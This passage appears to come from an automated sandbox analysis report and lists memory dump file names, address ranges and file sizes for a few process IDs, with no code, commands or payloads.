1.6MB
-
memory/4756-150-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4756-154-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4756-155-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4756-149-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4756-148-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4756-159-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4756-146-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4756-156-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4756-161-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4756-147-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4756-145-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4756-144-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4756-143-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4756-141-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4756-140-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4756-153-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4756-138-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4756-137-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4756-136-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4756-157-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4756-135-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4756-164-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4756-133-0x0000000000000000-mapping.dmp
-
memory/4756-158-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4756-167-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4756-160-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4756-168-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4756-162-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4756-163-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4756-166-0x0000000077C70000-0x0000000077DFE000-memory.dmpFilesize
1.6MB
-
memory/4892-1278-0x0000000000000000-mapping.dmp
-
memory/4904-1304-0x0000000000000000-mapping.dmp
-
memory/4916-1003-0x0000000000000000-mapping.dmp
-
memory/5092-1239-0x0000000000000000-mapping.dmp
-
memory/5104-1042-0x0000000000000000-mapping.dmp